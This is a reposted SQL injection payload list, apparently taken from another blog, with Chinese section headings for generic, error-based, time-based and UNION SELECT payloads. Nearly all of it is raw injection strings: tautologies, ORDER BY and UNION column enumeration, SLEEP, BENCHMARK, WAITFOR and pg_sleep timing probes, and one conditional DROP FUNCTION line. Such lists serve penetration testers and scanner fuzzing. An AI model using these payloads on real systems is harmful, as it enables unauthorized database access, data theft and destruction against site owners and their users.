) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23
他人博客
1. 通用SQL注入Payloads
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+addition, concatenate (or space in url)
||(double pipe) concatenate
%wildcard attribute indicator
@variablelocal variable
@@variableglobal variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
Comments:
# Hash comment
/* C-style comment
-- -SQL comment
;%00Nullbyte
` Backtick
2. 常规 Error Based Payloads
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1--
OR 1=0--
OR x=x--
OR x=y--
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
HAVING 1=1
HAVING 1=0
HAVING 1=1#
HAVING 1=0#
HAVING 1=1--
HAVING 1=0--
AND 1=1
AND 1=0
AND 1=1--
AND 1=0--
AND 1=1#
AND 1=0#
AND 1=1 AND '%'='
AND 1=0 AND '%'='
AND 1083=1083 AND (1427=1427
AND 7506=9091 AND (5913=5913
AND 1083=1083 AND ('1427=1427
AND 7506=9091 AND ('5913=5913
AND 7300=7300 AND 'pKlZ'='pKlZ
AND 7300=7300 AND 'pKlZ'='pKlY
AND 7300=7300 AND ('pKlZ'='pKlZ
AND 7300=7300 AND ('pKlZ'='pKlY
AS INJECTX WHERE 1=1 AND 1=1
AS INJECTX WHERE 1=1 AND 1=0
AS INJECTX WHERE 1=1 AND 1=1#
AS INJECTX WHERE 1=1 AND 1=0#
AS INJECTX WHERE 1=1 AND 1=1--
AS INJECTX WHERE 1=1 AND 1=0--
WHERE 1=1 AND 1=1
WHERE 1=1 AND 1=0
WHERE 1=1 AND 1=1#
WHERE 1=1 AND 1=0#
WHERE 1=1 AND 1=1--
WHERE 1=1 AND 1=0--
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
ORDER BY 4--
ORDER BY 5--
ORDER BY 6--
ORDER BY 7--
ORDER BY 8--
ORDER BY 9--
ORDER BY 10--
ORDER BY 11--
ORDER BY 12--
ORDER BY 13--
ORDER BY 14--
ORDER BY 15--
ORDER BY 16--
ORDER BY 17--
ORDER BY 18--
ORDER BY 19--
ORDER BY 20--
ORDER BY 21--
ORDER BY 22--
ORDER BY 23--
ORDER BY 24--
ORDER BY 25--
ORDER BY 26--
ORDER BY 27--
ORDER BY 28--
ORDER BY 29--
ORDER BY 30--
ORDER BY 31337--
ORDER BY 1#
ORDER BY 2#
ORDER BY 3#
ORDER BY 4#
ORDER BY 5#
ORDER BY 6#
ORDER BY 7#
ORDER BY 8#
ORDER BY 9#
ORDER BY 10#
ORDER BY 11#
ORDER BY 12#
ORDER BY 13#
ORDER BY 14#
ORDER BY 15#
ORDER BY 16#
ORDER BY 17#
ORDER BY 18#
ORDER BY 19#
ORDER BY 20#
ORDER BY 21#
ORDER BY 22#
ORDER BY 23#
ORDER BY 24#
ORDER BY 25#
ORDER BY 26#
ORDER BY 27#
ORDER BY 28#
ORDER BY 29#
ORDER BY 30#
ORDER BY 31337#
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
ORDER BY 5
ORDER BY 6
ORDER BY 7
ORDER BY 8
ORDER BY 9
ORDER BY 10
ORDER BY 11
ORDER BY 12
ORDER BY 13
ORDER BY 14
ORDER BY 15
ORDER BY 16
ORDER BY 17
ORDER BY 18
ORDER BY 19
ORDER BY 20
ORDER BY 21
ORDER BY 22
ORDER BY 23
ORDER BY 24
ORDER BY 25
ORDER BY 26
ORDER BY 27
ORDER BY 28
ORDER BY 29
ORDER BY 30
ORDER BY 31337
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
and (select substring(@@version,1,1))='X'
and (select substring(@@version,1,1))='M'
and (select substring(@@version,2,1))='i'
and (select substring(@@version,2,1))='y'
and (select substring(@@version,3,1))='c'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
3. 通用 Time Based SQL Injection Payloads
# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
4. 通用 Union Select Payloads
bash
ORDER BY SLEEP(5)
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY SLEEP(5)#
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY SLEEP(5)--
ORDER BY 1,SLEEP(5)--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 1
UNION ALL SELECT 1,2
UNION ALL SELECT 1,2,3
UNION ALL SELECT 1,2,3,4
UNION ALL SELECT 1,2,3,4,5
UNION ALL SELECT 1,2,3,4,5,6
UNION ALL SELECT 1,2,3,4,5,6,7
UNION ALL SELECT 1,2,3,4,5,6,7,8
UNION ALL SELECT 1,2,3,4,5,6,7,8,9
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 1#
UNION ALL SELECT 1,2#
UNION ALL SELECT 1,2,3#
UNION ALL SELECT 1,2,3,4#
UNION ALL SELECT 1,2,3,4,5#
UNION ALL SELECT 1,2,3,4,5,6#
UNION ALL SELECT 1,2,3,4,5,6,7#
UNION ALL SELECT 1,2,3,4,5,6,7,8#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNION ALL SELECT 1--
UNION ALL SELECT 1,2--
UNION ALL SELECT 1,2,3--
UNION ALL SELECT 1,2,3,4--
UNION ALL SELECT 1,2,3,4,5--
UNION ALL SELECT 1,2,3,4,5,6--
UNION ALL SELECT 1,2,3,4,5,6,7--
UNION ALL SELECT 1,2,3,4,5,6,7,8--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION SELECT @@VERSION,SLEEP(5),3
UNION SELECT @@VERSION,SLEEP(5),USER(),4
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
